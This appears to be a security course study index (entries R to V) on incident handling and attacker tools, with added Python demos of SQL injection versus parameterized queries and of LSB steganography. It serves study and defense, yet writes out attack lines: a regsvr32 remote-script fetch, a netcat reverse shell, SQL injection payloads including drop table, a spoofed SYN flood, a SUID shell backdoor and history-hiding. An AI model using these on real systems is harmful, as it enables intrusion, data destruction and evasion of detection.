Recovery Validation (Book 1, p. 123): recover systems into production in a safe manner. Validate your systems. Baseline. Checklist. Test.
Redline tool: memory analysis of a compromised system; analyze for indicators of compromise
Reflected DDoS attacks (Book 4, p. 165): bounce the attack off third-party servers: spoofed SYNs to many servers, whose SYN-ACKs flood the victim

reg \\[MACHINE NAME] (Book 1, p. 126): registry command that also works remotely, to check for changes to the registry
reg query (Book 1, pp. 69, 85, 192)
regedit (Book 1, pp. 69, 85; Book 4, p. 50)
Registration attack register similar domain names to fool users. Eg vvindowsupdate.com
regsvr32 & scrobj.dll (Book 3, p. 150): regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll invokes the script on our behalf (regsvr32 does not run it itself); the script can be fetched from an external URL
Rekall (Book 1, pp. 39, 110; Book 5, pp. 22-27, 29, 31-35): capture and analyze memory on Windows
rel (Book 1, pp. 208, 212, 222, 229, 235, 239)
Relay (Book 1, p. 167; Book 3, pp. 11, 15, 22-26, 28, 35, 40-43, 117; Book 4, pp. 66, 73, 164; Book 5, p. 39)
Remote Desktop Protocol (RDP) (Book 2, pp. 42, 98, 115; Book 4, pp. 8, 55)
Remote Procedure Call (RPC) (Book 1, pp. 83, 256; Book 2, pp. 93, 109, 148; Book 3, pp. 17, 123, 131; Book 5, p. 37)
Remux.py (Book 2, p. 99): reverse multiplexer; runs from the browser to scan proxies. Learns
Reporting facilities (Preparation) (Book 1, p. 36): educate users on where to report: publish a list of indicators, email, phone, intranet. Update management, prepare a war room.
Reserved (Book 2, p. 88; Book 4, pp. 19, 37; Book 5, pp. 105, 128, 131)
RESET (Book 2, pp. 90, 94, 114; Book 4, pp. 7, 96, 150-151, 176, 188; Book 5, pp. 129-130, 178, 181, 184)
RestrictAnonymous registry key: its values control what anonymous (null) sessions may enumerate (users, shares, password policy)
Responder (Book 1, pp. 96, 132-133, 135; Book 3, pp. 4, 6, 51, 70, 73, 80-83, 88-89, 91-92)
Retina (Book 2, p. 119): vulnerability scanner (commercial)
Return Pointer (RP) (Book 3, pp. 99-100, 102, 105, 107-109, 119, 122-124): the stack is very dynamic, so it is difficult to find the exact address where the injected code starts (hence NOP sleds)
Return-Oriented Programming (ROP) (Book 3, p. 123)
Reverse HTTP shell (Book 5, p. 122): the shell on the victim surfs out asking for commands; the attacker sends commands back as HTTP responses. Supports proxy authentication.

reverse shell (Book 3, pp. 21, 28-29, 34, 113, 115)
Reverse Shell defense 3 21 inspect web traffic at the IDS
Reverse WWW Shell 5 134
robots.txt (Book 2, p. 44): standard used by websites to tell web crawlers and other robots which areas not to process or index (and therefore a map of what the owner wants hidden)
rootkit (Book 1, pp. 42, 118-119, 258; Book 2, p. 14; Book 4, p. 101; Book 5, pp. 6-7, 41-50, 52-56, 58, 60-69, 71-73, 75, 79-80, 82; Book 6, pp. 17, 37-38): alters the OS to keep access; hides logons, programs, files and processes from system admins


Rootkit backdoor components (Linux) (Book 5, p. 44): login, rshd, sshd, inetd and TCP services are all replaced with modified versions; the attacker supplies the rootkit password and gets root.
Rootkit detection tools Linux (Book 5, p. 65): chkrootkit (link count and binary checks), Rootkit Hunter, OSSEC Rootcheck; check for inconsistencies.
Rootkit detection tools Windows (Book 5, p. 66): Sophos Anti-Rootkit, McAfee Rootkit Detective, RootkitRevealer, file integrity tools
Rootkit hiding (Book 5, p. 47): load the rootkit in a folder and run it as admin; all associated files, processes and network connections are hidden.
Rootkit hooking in action (Book 5, p. 48): injects exp.dll into exp.exe and then hooks into iexp.dll for its code; everything is saved in System32.
Rootkit Hunter 5 65
Rootkit platforms (Book 5, p. 42): Linux: Linux Rootkit 4, LRK5, LRK6; also Solaris, BSD, AIX, HP-UX, IRIX, Windows

Rooty (Book 5, pp. 60-61): installed via LKM; detects whether the system is 32- or 64-bit; alters lsmod and systrace output. Creates two worlds (a "cone of silence") by altering system calls; the attacker's files are hidden from the admin.
Rose attack: sends a highly fragmented packet, transmitting the last fragment over and over again on the network; causes CPU consumption, NOT a packet flood.

Round-Robin DNS (Book 4, p. 71): round-robin DNS records with a 3-10 minute TTL, populated with proxies; double flux
Return-Oriented Programming (ROP) (Book 3, p. 123): alter return pointers so the program executes existing library code from legitimate OS code instead of attacker-injected code. Used to bypass DEP (Data Execution Prevention, Windows).
rpcclient (Book 2, pp. 137, 145, 150, 153-155, 157, 162): rpcclient -U [username] [IP] establishes an SMB session from Linux using Samba's rpcclient; then enumdomusers, enumalsgroups, lsaenumsid, lookupsids, srvinfo etc.
rpcclient - group membership (Book 2, p. 162): lookupnames administrators; queryaliasmem builtin 544 (default RID of Administrators); lookupsids
rpcclient - groups and server info (Book 2, p. 154): enumalsgroups domain; enumalsgroups builtin; srvinfo
rpcclient -U test [IP]: enumerate target information by logging in: srvinfo, queryuser, lookupnames test
Rubber Ducky (Book 3, pp. 5-6; Book 2, p. 74 shows a screenshot of a similar device): USB stick that acts as an automated keyboard; downloads and runs malware, steals data, etc.
runas 1 90 /user:Administrator cmd.exe
S-Tools: embeds data in BMP files using LSB substitution; the result looks identical to the eye.
S-Tools detection: compare to the original color table; more duplicate colors; the color histogram differs.
S-Mail 5 148 hides data in .exe and DLL files
SAINT (Book 2, p. 119): vulnerability scanner (commercial)
salt (Book 4, pp. 19-22, 28; Book 5, p. 173): random value mixed into the hash so identical passwords produce different hashes; defeats precomputed tables
SAM database (Book 3, pp. 18, 162; Book 4, pp. 5, 16, 20, 25, 28-29, 31)
Samba (Book 1, p. 31; Book 2, pp. 70, 137, 144-145; Book 4, p. 51)
Samba daemon (smbd) (Book 2, p. 137)
Santy worm (Book 2, p. 42): searched Google for vulnerable versions of the phpBB script, then attacked the systems running it
Sasser (Book 4, pp. 55, 57-59)


sc query (Book 1, pp. 68, 83; Book 2, p. 102): sc query lists services; sc stop [service] stops a service on Windows
scanf 3 103
Scapy: Python packet-crafting tool
Scareware 5 16 form of malware which uses social engineering to cause shock
Scheduled Tasks (Book 1, pp. 62, 73, 86-87, 253)
schtasks (Book 1, pp. 73, 87)
SearchDiggity (Book 2, p. 43): runs searches across multiple search engines to speed up finding information
SECEVENTS.EVTX 5 114
Setiri: running on a victim machine, periodically surfs to the connection broker using an invisible browser, out through the personal/network firewall and an anonymizer, over HTTPS.
secpol.msc (Book 1, p. 89; Book 5, p. 45; Book 6, p. 33)
Search Directives 2 37 "link:","site:","intitle:","related:","info:"
Search engine recon - automated (Book 2, p. 43): Bishop Fox's Diggity, recon-ng (target compromised accounts), PunkSPIDER

Search engine recon - defenses (Book 2, p. 44): check your own environment, request removal of indexed or cached pages, robots.txt
Search tips (Book 2, p. 38): "soc sec num" +xls -pdf pulls up Excel sheets containing social security numbers, excluding PDFs
Searching for file types (Book 2, p. 40): site:www.[target].com with asp/jsp/bak/cgi etc.; another method is filetype: or ext:
Searching for vulnerable systems (Book 2, p. 42): ext:rdp rdp; "select a database to view"; intitle:index.of "parent directory"
Security event logs (eventquery), XP: eventquery.vbs /L security
Security event logs (wevtutil), Win7: wevtutil qe security /f:text > logs.txt
Security policy Log entry 1 89 secpol.msc; check for unusual entries in audit log
Secure responses on DNS (BIND): BIND 4 and BIND 8 don't filter and therefore accept more information than was asked for; use BIND 9.
Security Onion 5 68 Single best open source network forensic distribution
SECURITY.LOG 5 114
Sequence Number field 5 128-130
Server Message Block (SMB) (Book 1, pp. 65-66; Book 2, pp. 137-140, 142-148, 156-162; Book 3, pp. 80, 92, 155, 173; Book 4, pp. 30, 49-52, 57; Book 6, pp. 36, 51): drop outbound sessions with net use \\[IP] /del or net use * /del; drop inbound sessions with net session \\[IP] /del
services.msc (Book 1, pp. 68, 83; Book 2, p. 102)
Session hijacking: combines sniffing and spoofing; option 1: at the origin or destination host; option 2: network based.
Session hijacking ACK storms: the TCP sequence numbers get out of sync because of the hijack and the victim keeps sending ACKs.
sessionID (Book 4, pp. 143, 149): carried to the browser by URL tracking, hidden form elements and cookies.
Session ID hacking: URL tracking: modify it in the URL; hidden form elements: save the page and modify it; cookies: close the browser, save and modify the cookie.
sessions -l 3 159
set LHOST, RHOST, SMBPass, SMBUser (Book 3, p. 157): configure variables; set XXX example

set LHOST, RHOST, SMBPass, SMBUser (Book 6, p. 51): set xxxx command list, Metasploit
Set-ExecutionPolicy 2 159
Set-NetAdapter 2 72
Shell History 5 86 ~/.bash_history
Shell Tips 1 207
Shellcode (Book 3, pp. 119, 138, 147-148; Book 5, p. 133)
Shodan 2 41, 43, 50-51
shoveling shell (reverse shell back to the attacker) (Book 3, pp. 21, 115): on the listener: nc -l -p [port]; on the client (victim): nc [ListenerIP] [port] -e /bin/sh
shutdown (Book 1, pp. 110, 114, 208, 212, 222, 229, 235, 239, 244; Book 5, p. 79): shutdown -h now (halt); shutdown -r now (shutdown and reboot); reboot
SilentEye 5 149
Slapper (Book 4, p. 57): multi-exploit worm
Sleuth Kit (Book 1, pp. 41, 43; Book 3, p. 133)
Slowloris attack: issues a series of slow, partial HTTP requests that hold connections open; Apache (not IIS) is vulnerable; the network is not flooded.
Slowloris attack defense: Prep: patch. Identification: IDS signatures. Containment: filter the source address, load balance. Recovery: block and restart the HTTP daemon.
Smashing the stack (Book 3, p. 100): the buffer is overflowed; data written past the buffer overwrites the return pointer; the exploit runs.
SMB evil sessions defense: block at boundaries where admin access is not required: TCP/UDP 445, TCP 135, TCP 139, UDP 137 and 138

SMB protocol (Book 2, p. 138): layer-7 protocol that implements file and printer sharing, domain authentication and remote administration.
SMB session defense (Book 2, p. 147): Prep: block inbound traffic between workstations; block null sessions using registry keys; on non-admin systems and file shares block SMB ports 445 and 135-139. Identification: check logs.
SMB session initiation (Book 2, p. 138): net use \\[targetIP]; net use \\[targetIP]\[shareName]; net use \\[targetIP] "" /u:"" (null session)
smbclient (Book 2, pp. 144, 152): smbclient -L [WinIP] -U [username] -p 445 establishes an SMB session from Linux to Windows and pulls the list of shares; smbclient //[WinIP]/test -U [username] -p 445 opens an interactive session on a share (FTP-like: cd, ls, get)
Smurf amplifier list: powertech.no/smurf; nmap -n -sP -PE -oN Smurf '209.12.*.63,127,191,255'
Smurf amplifier: a network that answers directed broadcast messages
Smurf attack: sends spoofed ICMP echo requests (pings) to a broadcast address; the spoofed source machine is flooded with the replies
Smurf defenses: filter ICMP at the gateway, allowing only what is needed. Identification: ping replies to requests you never sent and other unsolicited ICMP; many different source IPs from the same LAN.
Snarfing (Book 3, p. 54): filesnarf, mailsnarf, urlsnarf, msgsnarf (Dsniff suite) capture their data type off the wire and save it to the local host
Sneaking: forces a TELNET shell to be executed from an internal machine out to another machine
Sniffers (Book 3, pp. 45-46; Book 4, p. 29; Book 5, p. 52)
Sniffing and Session Hijacking Defense: Prep: hardcode ARP tables, port security, dynamic ARP inspection with DHCP snooping, encrypted protocols (encrypted VPN, SSHv2). Identification: users lose sessions, messed-up ARP entries, DNS cache anomalies, SSH client error messages. Containment: drop sessions. Eradication & Recovery: change passwords, rebuild systems.

Sniffing backdoor defenses: Prep: keep attackers off systems. Identification: look for weird traffic, processes and sniffers. Containment/Eradication/Recovery: remove backdoors; TLS 1.2, hardcoded ARP, SSHv2, IPsec.
Sniffing backdoor modes: promiscuous; non-promiscuous
Sniffing defenses - containment: check other systems, remove the sniffer program, change passwords, take interfaces out of promiscuous mode
Sniffing defenses - identification: ifconfig (PROMISC flag), warnings in the browser, EtherApe, strange DNS queries; arp -a / arp -e, look for ARP manipulation, arpwatch, ipconfig /displaydns
Sniffing Passive & Active 3 44-68
Sniffit: captures network traffic with a GUI; lets the attacker look at the data

Sniff SSL and SSH (Dsniff) (Book 3, p. 60): run dnsspoof and webmitm/sshmitm; creates one tunnel from the user to the attacker and another from the attacker to the server. sshmitm substitutes the server's public key with its own.

snprintf syntax: snprintf(dest_str, size_of_buffer, format_str, [user_input]); the bounded replacement for the buffer-overflow-prone sprintf. It is still a format-string bug if user input is passed as format_str instead of as an argument.
Snort (Book 1, pp. 13, 114; Book 3, pp. 131, 134): protocol parser (an IDS parses everything on the wire, so its parsing code is a buffer overflow target)
Software distribution site defenses (Book 2, p. 13): check file integrity (MD5, SHA-1); check PGP signatures if available; test before you deploy
sort "%x%x%x%x": Windows format-string test; each %x prints the contents of the next memory location (stack value) to output
source /opt/useruby193.sh: different versions of Metasploit require different versions of Ruby; Metasploit 4.5.2 requires Ruby 1.9.3
Source ports for scanning: UDP 53, TCP 53 (DNS zone transfer), TCP 80 (most popular), TCP 443
Source Routing allows you to specify the path a source packet will take on the network
SPI Dynamics 4 146
Split DNS (DNS defense) (Book 2, p. 27): external name information only on the external server; internal name information on the internal server
sprintf 3 103
spurious sessions 3 86
Sptoolkit 1 20 tools to create phishing campaigns for employee assesment
SQL injection (SQLi) (Book 4, pp. 103-111, 124, 128-141, 147, 150; Book 5, pp. 168-172, 174): manipulate the backend database via an input field
SQL injection characters and commands (Book 4, p. 105): -- (comment), ; (query terminator), * (wildcard), % (match any string), _ (match one character), OR, 1=1 (always true), SELECT, JOIN, UPDATE
SQL injection defenses - identification (Book 4, p. 111): SIEM logs, web app logs, DLP to spot data exfiltration. Containment: block the IP and account. Eradication: remove the attacker's data.
SQL injection defenses - preparation (Book 4, p. 110): limit the web app's database permissions, keep input separate from code (parameterized queries), filter input, accept only alphanumerics, encode < as &lt; etc.
SQL injection example - dropping data (Book 4, p. 107): Fred';drop table users;-- (the users table gets dropped; -- comments out the rest of the query, or use /*)
SQL injection example - finding an input error (Book 4, p. 106): enter Fred' in the username field; the DB sees Fred'' and returns a syntax/DB/SQL error
SQL injection example - get DB structure (Book 4, p. 109): Fred' union select name,1,'1',1,'1' from master..sysdatabases;--
SQL injection example - grabbing data (Book 4, p. 108): ' or 1=1;-- in the username field returns all users from the DB
SQL injection vulnerabilities (Book 4, p. 104): find input that becomes part of a DB query, e.g. the username; add a single quote; bypass filtering. Tools: Nmap SQLInject.nse, ZAP proxy, Burp Suite, sqlmap, Havij


SQL parameterized stored procedure in the web app: prepared SQL code that is saved and reused; the query shape (SELECT ... FROM ... WHERE ... AND ...) is fixed and user input is bound as parameters rather than spliced into the text
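Added example (not part of the original index): the four SQL injection examples above run against a throwaway SQLite table, with the string-built query beside its parameterized form so the difference the last row describes is visible. The users table and payloads are constructed; execute_stacked() is this example's model of a backend such as MSSQL that accepts stacked ;-separated queries, since sqlite3's execute() refuses more than one statement.

```python
"""Vulnerable string-built login query beside its parameterized form.
Added example; the users table and payloads are constructed. execute_stacked()
models a backend that accepts stacked queries (MSSQL does; sqlite3 alone does not)."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('Fred', 'fredpw'), ('Alice', 'alicepw'), ('Bob', 'bobpw');
    """)
    return conn


def execute_stacked(conn, sql):
    """Run ';'-separated statements in order; return the rows of the first that yields any.
    A statement starting with '--' is the commented-out tail of the original query."""
    rows = []
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if not stmt or stmt.startswith("--"):
            continue
        got = conn.execute(stmt).fetchall()
        if got and not rows:
            rows = got
    return rows


def login_vulnerable(conn, username, password):
    # Input is spliced into the query text, so ' ; and -- rewrite its structure.
    sql = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (username, password)
    return [r[0] for r in execute_stacked(conn, sql)]


def login_safe(conn, username, password):
    # Bound parameters: values travel separately from the fixed query shape.
    cur = conn.execute("SELECT name FROM users WHERE name = ? AND password = ?",
                       (username, password))
    return [r[0] for r in cur.fetchall()]


def probe_for_error(conn, username):
    """The Fred' test: a lone quote in a vulnerable query surfaces as a DB error."""
    try:
        login_vulnerable(conn, username, "x")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def table_exists(conn, name):
    cur = conn.execute("SELECT count(*) FROM sqlite_master WHERE type='table' AND name=?", (name,))
    return cur.fetchone()[0] == 1


if __name__ == "__main__":
    db = make_db()
    print("probe:", probe_for_error(db, "Fred'"))
    print("grab all:", login_vulnerable(db, "' or 1=1;--", "x"))
    print("safe, same input:", login_safe(db, "' or 1=1;--", "x"))
    login_vulnerable(db, "Fred';drop table users;--", "x")
    print("users table still there:", table_exists(db, "users"))
```

The parameterized version returns nothing for every payload and leaves the table intact; note that it only protects the values it binds, so a table or column name built from user input needs a whitelist instead.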
SQL Slammer (Book 1, p. 96; Book 4, p. 55)
SQLInject.nse 4 104
sqlmap 4 104
sshd (Book 1, p. 256; Book 4, pp. 185-186, 188; Book 5, pp. 43, 50)
SSHmitm 3 63
SSID cloaking 2 60-61
SSLStrip (Book 2, p. 68; Book 3, pp. 51, 67-68): strips SSL from HTTPS; serves the victim plain HTTP while the site still looks like HTTPS to them
startup items (Windows) (Book 1, pp. 69, 70, 86): HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce and RunOnceEx; wmic startup list full; dir /s /b "C:\Documents and Settings\[userName]\Start Menu\"; msconfig.exe
start C:\tmp\test.txt:nc.exe 5 110 Executable in Alternative Data Stream
Stash (Stego) (Book 5, p. 148): hides data in a variety of image formats
Statically-linked binary: a self-contained program that needs no external libraries
Steganography (Book 5, pp. 147-156): concealing data inside images, Word documents, text, CGI output, JPEG
Steganography - how it works: requires a host file (the host can itself be generated); the hidden message is embedded in a file or generates a file
Steganography - generate new file: the hidden message can generate a new file; used with CGIs, e.g. input text used to generate fractals
Steganography - types: injection, substitution (can lower the quality of the resulting file) and generating a new file
Steganography defenses (Book 5, pp. 155-156): Prep: learn the stego tools; integrity-check web server files. Identification: compare with the original, hash; involve HR and legal; monitor the victim and compare to the original image; use stegdetect. Containment etc.: HR, legal.
Steganography example (image LSB): substitution changes the least significant bit of each sample, with minimal impact on the pixel color as seen by the human eye
Stegdetect (Book 5, p. 156): detects data hidden with JSteg, JPHide, Invisible Secrets, OutGuess, F5, appended data
Stego tools (Book 5, pp. 148-149): JSteg, MP3Stego, S-Mail (hides data in exe and DLL), Invisible Secrets (in ads), Hydan (Windows, Linux)
Stego vs crypto: with crypto you know data is being sent but cannot read it; with stego you don't know data is being sent at all
StegExpose (Book 5, p. 154): Java utility that detects LSB steganography in lossless images
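Added example (not part of the original index): LSB substitution as described in the stego rows above, done on a raw byte array that stands in for an 8-bit image channel, plus the "compare with the original" detection the defenses row recommends. The cover samples and the hidden message are constructed; no image library is needed because only the sample values matter.

```python
"""LSB substitution stego on a raw 8-bit sample array, with compare-to-original detection.
Added example; COVER is a constructed stand-in for an image channel."""

COVER = bytes((i * 37) % 256 for i in range(4096))   # constructed 'pixels'


def _bits(data: bytes):
    """Yield the bits of data, most significant bit first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed_lsb(cover: bytes, payload: bytes) -> bytes:
    """Substitute the LSB of successive samples with a 2-byte length header and the payload.
    Each touched sample changes by at most 1, invisible to the eye."""
    if len(payload) > 0xFFFF:
        raise ValueError("payload too long for the 16-bit length header")
    framed = len(payload).to_bytes(2, "big") + payload
    if len(framed) * 8 > len(cover):
        raise ValueError("cover too small: need %d samples" % (len(framed) * 8))
    out = bytearray(cover)
    for i, bit in enumerate(_bits(framed)):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract_lsb(stego: bytes) -> bytes:
    """Read the LSBs back: first the length header, then that many payload bytes."""
    def read(nbytes: int, offset: int) -> bytes:
        vals = bytearray()
        for b in range(nbytes):
            v = 0
            for k in range(8):
                v = (v << 1) | (stego[offset + b * 8 + k] & 1)
            vals.append(v)
        return bytes(vals)
    length = int.from_bytes(read(2, 0), "big")
    return read(length, 16)


def diff_stats(cover: bytes, stego: bytes):
    """Detection when you hold the original: how many samples changed and by how much.
    LSB substitution leaves a run of +/-1 changes at the start of the file."""
    changed = sum(1 for a, b in zip(cover, stego) if a != b)
    max_delta = max((abs(a - b) for a, b in zip(cover, stego)), default=0)
    return changed, max_delta


if __name__ == "__main__":
    s = embed_lsb(COVER, b"meet at 0400")
    print(extract_lsb(s))
    print(diff_stats(COVER, s))
```

Without the original, the same property is what tools like stegdetect and StegExpose look for statistically: the LSB plane of a natural image is not perfectly random, and a substituted region looks different from the untouched remainder.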
strcpy (Book 3, pp. 96, 103, 107)
Stream Control Transmission Protocol (SCTP) (Book 5, p. 132): possible covert channel; multiplexed and multi-streaming, sends data over multiple connections, multihoming, built-in C2 server failover
Streams (Book 5, p. 106): Microsoft Sysinternals tool for Alternate Data Streams; lists and can delete streams
strncpy 3 96, 103, 107
Structured Query Language (SQL) (Book 4, pp. 8, 26, 55, 103-111, 124, 128-130, 136-137, 141, 147, 150; Book 5, pp. 64, 168-172, 174)
Stuxnet (Book 3, pp. 65, 146; Book 4, pp. 55, 57-59, 64; Book 5, p. 55)
Subroutines (Book 3, p. 98): make the CPU's instruction pointer jump to a new location in memory to run code


Subterfuge (Book 3, p. 64): like Dsniff but with a nice GUI; can also hijack sessions, strip SSL or downgrade to HTTP, block VPNs
Substitution (stego): insignificant data in the host is replaced with the hidden message; can degrade the host
SubVert 5 58 VM based rootkit proof of concept
SucKIT 5 56, 65
sumfuq (Book 5, p. 50): originator of the kernel-mode rootkit
Supervisory Control And Data Acquisition (SCADA) (Book 3, p. 11; Book 4, pp. 58, 64)
supporting tools (Linux) (Book 1, p. 258): chkrootkit checks for rootkit anomalies; Tripwire/AIDE integrity checkers; fingerprint files
Suterusu 5 71-74
Set User ID (SUID) (Book 1, pp. 249, 261; Book 3, p. 106)
SYN (Book 1, p. 54: tcpdump flags [S] SYN, [S.] SYN/ACK, [.] ACK; Book 2, pp. 25, 90, 93-95: scan types, half-open connection; Book 3, pp. 36, 38: firewalls can block incoming SYNs; Book 4, pp. 154, 165, 167, 171, 175, 179-180, 185-186; Book 5, pp. 129-130: Covert_TCP modes)
SYN-ACK (Book 2, pp. 25, 90, 93-94; Book 4, pp. 165, 185)
SYN flood (Book 4, p. 180): hping --syn --count 20 --spoof 10.10.11.11 -p 445 [target_machine]
SYN flood - defenses (Book 4): Prep: Linux SYN cookies: ISNb = hash(secret, source IP & port, destination IP & port) + ISNa + time, so the server keeps no state until the final ACK returns
SYN flood - exhausting resources: send SYNs and never the ACK, tying up all connection slots or all bandwidth; use unresponsive spoofed source IPs so no RST comes back
SYS_execve 5 51, 53, 55
1 69, 77, 126, 141
Sysinternals
2 137
5 66, 106
3 162
SYSKEY
4 31 provides extra 128-bit encrytion of SAM db when stored in Registry

syslog 5 44, 85, 117-118


2 104, 126, 135
systemctl
4 185-186, 188
show all input field currently viewed,default and empty
Tamper Data 4 144 values.manipulate http req

1 236 xvf X-extract V-verbose F-from file xvfz Z-unzip first before opening
tar file
5 94, 99 Lab:Shell History
tar / untar. Archives and 1 236 tar cvf ,tar xvf, tar cvfz, tar xvfz
compression
Taranis 3 acts like macof;sends eth frames to trick switch thich 1 MAC is simultan on 2 ports
1 81-83, 126
164-165, 167,
3 169, 173
Task Manager (tasklist)
4 177-178
5 27, 35
Tasklist | find /I /c "notepad.exe" 4 178 count the nr of processes named notepad.exe



Tasklist cmd can be run remotely (1: 126): by psexec from Microsoft Sysinternals. ps in Linux
TCP 139 (2: 148): NetBIOS Session Service
TCP 22 (4: 185): SSH
TCP 445 (2: 89; 4: 179): SMB; SMB is always listening
TCP 5500 (5: 12): VNC listening mode: server sends GUI via 5500 to client
TCP 5800 (5: 12): serves up a Java applet of a VNC viewer
TCP 5900 (5: 12): VNC active mode: server listening on TCP 5900 by default
TCP 6667 (IRC to control bots) (4: 68): bots can be controlled with IRC; one-to-many communication
TCP 80 (2: 89): web server HTTP
TCP and UDP ports (2: 89): 65536 for TCP and the same for UDP; TCP tries to deliver messages; UDP messages may drop
TCP control bits and 3-way handshake (2: 90): SYN, ACK, FIN, RESET, URG, PUSH
Tcpdump (1: 54, 266; 2: 25, 106; 5: 101, 141): -nn 'port 27917'; host 10.10.75.1 & -> :LOG output. Attackers find connected systems by dumping DNS records; -i lo. ./tcpdump -n -s0 -w init.out port 80 & (-s0: snap length unlimited, size of the packet to capture). tcpdump -i lo -s0 -A host 10.10.75.1 | grep VIEWSTATE (-A: include the ASCII from the dump)
TCP header (2: 91): src port, dest port, sequence number, ack number, control bits
TcpKill (3: 53): sends spoofed resets to both sides to kill connections, forcing re-auth; grab auth
TcpNice (3: 53): sends packets to slow down a conversation so the attacker can sniff a fast connection
TCPView (1: 77; 2: 101): TCP & UDP; shows CURRENT traffic (GUI); non-GUI version is TCPVcon; shows all TCP and UDP endpoints on Windows systems
tcptraceroute and Layer Four Traceroute (2: 124): send packets through a packet filter device to determine which ports are open
Team (preparation) (1: 30): computer & physical security, operations, network management, legal, HR, DR etc.
Team Organization (1: 32): define the IH team: onsite techies, command post. Establish response time baseline
Teardrop (4: 154, 161): strangely fragmented packets that cause DoS
Tenable (1: 121; 2: 119-120, 123)
Ticketing tools (1: 104): RTIR, CyberSponse, Orion Live CD
Time Exceeded (2: 83, 85)
Tiny Fragment Attack: first fragment is tiny and carries part of the offending traffic; second packet carries the rest
Topology (2: 80, 84; 6: 32, 48)
Traceroute, how it works traditionally (2: 83): Linux: 1st packet with TTL=1, router decrements to 0 and sends TTL Exceeded. 2nd packet TTL=2
Train the team (1: 37): plan, set up tools, deploy honeypots, forensics image in multiple ways, unannounced pen test
transform (2: 46-47; 5: 50, 148)
Tripwire (1: 193, 258; 5: 7, 50, 67)
Truly Nasty Payload - Worms (4: 64): breeders consuming resources; steals info from the system; distributes bots
Truman: analyze malware in an isolated environment



Trust Relationships: must be monitored to ensure they are not exploited; during the CONTAINMENT process
Tunneling (5: 120, 127)
Tunneling and Covert Channels (5: 120): carrying a protocol over another. IP over IP, X Windows over SSH, IPoCP etc.
type C:\tools\nc.exe > C:\tmp\test.txt:nc.exe (5: 110): executable in Alternate Data Streams
type hackstuff.exe > notepad.exe:stream.exe (5: 104): hide files in a stream behind normal files
UDP Header (2: 89, 92; 5: 128): src port, dest port, message length, checksum
uname -a (5: 98): kernel version of the system
Unauthorized use (1: 11, 21, 166-172, 175): user abuses normal access, e.g. email problems and inappropriate web surfing
unlinked files (1: 250, 262): e.g. unlink /tmp/backdoor. lsof +L1 (shows files with a link count less than 1)
unset HISTFILE then kill -9 $$ (5: 87): change environment variable to hide shell history
Unusual accounts (no owner files) (1: 255): find / -nouser -print (files may be left by attacker; deleting the user leaves the files)
Unusual accounts (root privileges) (1: 254): sort -nk3 -t: /etc/passwd | less (uid=0) or better grep :0: /etc/passwd (uid/gid=0)
unusual cpu, memory and disk usage (1: 257): uptime, free, df
unusual files (redhat package manager tool) (1: 251): rpm -Va: changes to all installed packages; check size, MD5, permissions, type, owner, group
unusual files (suid root) x->s (1: 261): e.g. create sh backdoor: cd /tmp, cp /bin/sh /tmp/backd, chmod 4111 /tmp/backd
unusual files (suid, large, dot and space) (1: 249): find / -uid 0 -perm -4000 -print, find / -size +10M -print, find / -name " " -print
unusual files (unlinked) (1: 262): e.g. copy netcat to tmp folder, run in background, use unlink /tmp/nc to unlink
unusual files (windows) (1: 72): for /R C:\ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi. Files > 10MB
unusual log entries (1: 256): promisc mode, multiple failed logons, RPC with strange character sequence, Apache errors
unusual network usage (1: 252): lsof -i, netstat -nap, arp -a
unusual scheduled tasks (cron jobs) (1: 253): scheduled by root = crontab -u root -l; system-wide = cat /etc/crontab; ls /etc/cron.*
unusual services (1: 248): service --status-all, chkconfig --list (shows SysV services); systemctl list-unit-files (systemd services)
uptime (Linux cheatsheet) (1: 257): tells system load (CPU particularly)
UPX (5: 19): packing tool to make an executable difficult to analyze
User Mode Rootkit Defenses: Pre: don't let attacker get root, patch. Ide: ls vs "echo *"; use tools like chkrootkit, HIPS
User Mode Rootkit Defenses 2: Con: analyze other changes made. Era: re-image, patch, change passwords. Rec: monitor
useradd (1: 209, 264; 4: 43): -d [Home_dir] [login] > create non-root account
UserID (Netcat backdoor listener): the commands will be executed as the user that ran the Netcat listener
utmp (/var/run/utmp) (5: 89-90): info about currently logged-in users
Veil (Veil-Evasion) (3: 140-142; 5: 18): create macro to insert in malicious file (book 3); anti-virus bypass tool (book 5)
Veracode (binary analysis) (3: 127): no need for source code; checks compiled code for flaws
viewing output (less) (1: 221): less /dev or ls /dev | less
VIEWSTATE (5: 137, 141-142): HTML field used by the VSAgent backdoor for C2 commands



Virtual Machine escape: breaking out of a VM and interacting with the host box
Virtual Network Computing (VNC) (5: 9-14): free cross-platform remote access suite; most AV don't catch it because it is also legitimate
VirtualAllocEx (5: 45): allocate space in the victim process for DLL injection
Vmcat
VM detection: IR teams use VMs to test and defend against attacks. Malicious code can detect & destroy VMs: look for VME processes, memory, shifted interrupt descriptor table, VME hardware, processor instructions
VM Escape: allows an attacker in a guest to execute code on the host; Vmcat. VMcat is not a true escape because it coordinates processes between host & guest
VM Escape Defenses: patch; don't mix weak & strong systems / sensitive data with public; VMs are not firewalls
vmlinuz (5: 57): stored kernel image, typically located in the /boot directory
VMware (3: 77): MAC addresses beginning with 00:0c:29 are VMware
vmware machines (and associated files) (1: 198): .vmx, nvram, .vmdk, .vmss, .vmsn
vmware network options (1: 202): host-only, bridged and NAT
Vmware networking watch-out (1: 203): VMnet0 - bridged; VMnet1 - host only; VMnet8 - NAT
vmware uses (1: 197): IR, malware analysis, digital forensics, ethical and practice hacking
VNC Active and Listening client (5: 12): active: server listening on TCP 5900; listening mode: server sends GUI via TCP 5500 to client
VNC modes (WinVNC) (5: 13): app mode (in tray), service mode (in service list & tray after reboot), hide tray icon
VNC Platforms (5: 11): Windows, Linux, Solaris, HP-UX 11, Mac OS X. Works across platforms
Volatility (1: 43, 110; 5: 22): capture and analyze memory dumps on Windows
Volatility DLLs and Command Line: python2.7 vol.py dlllist -p [pid] -f [path to mem_capture] --profile=(OS)
Volatility Invoke using python: python2.7 vol.py -h. For help: python2.7 vol.py [module] -h
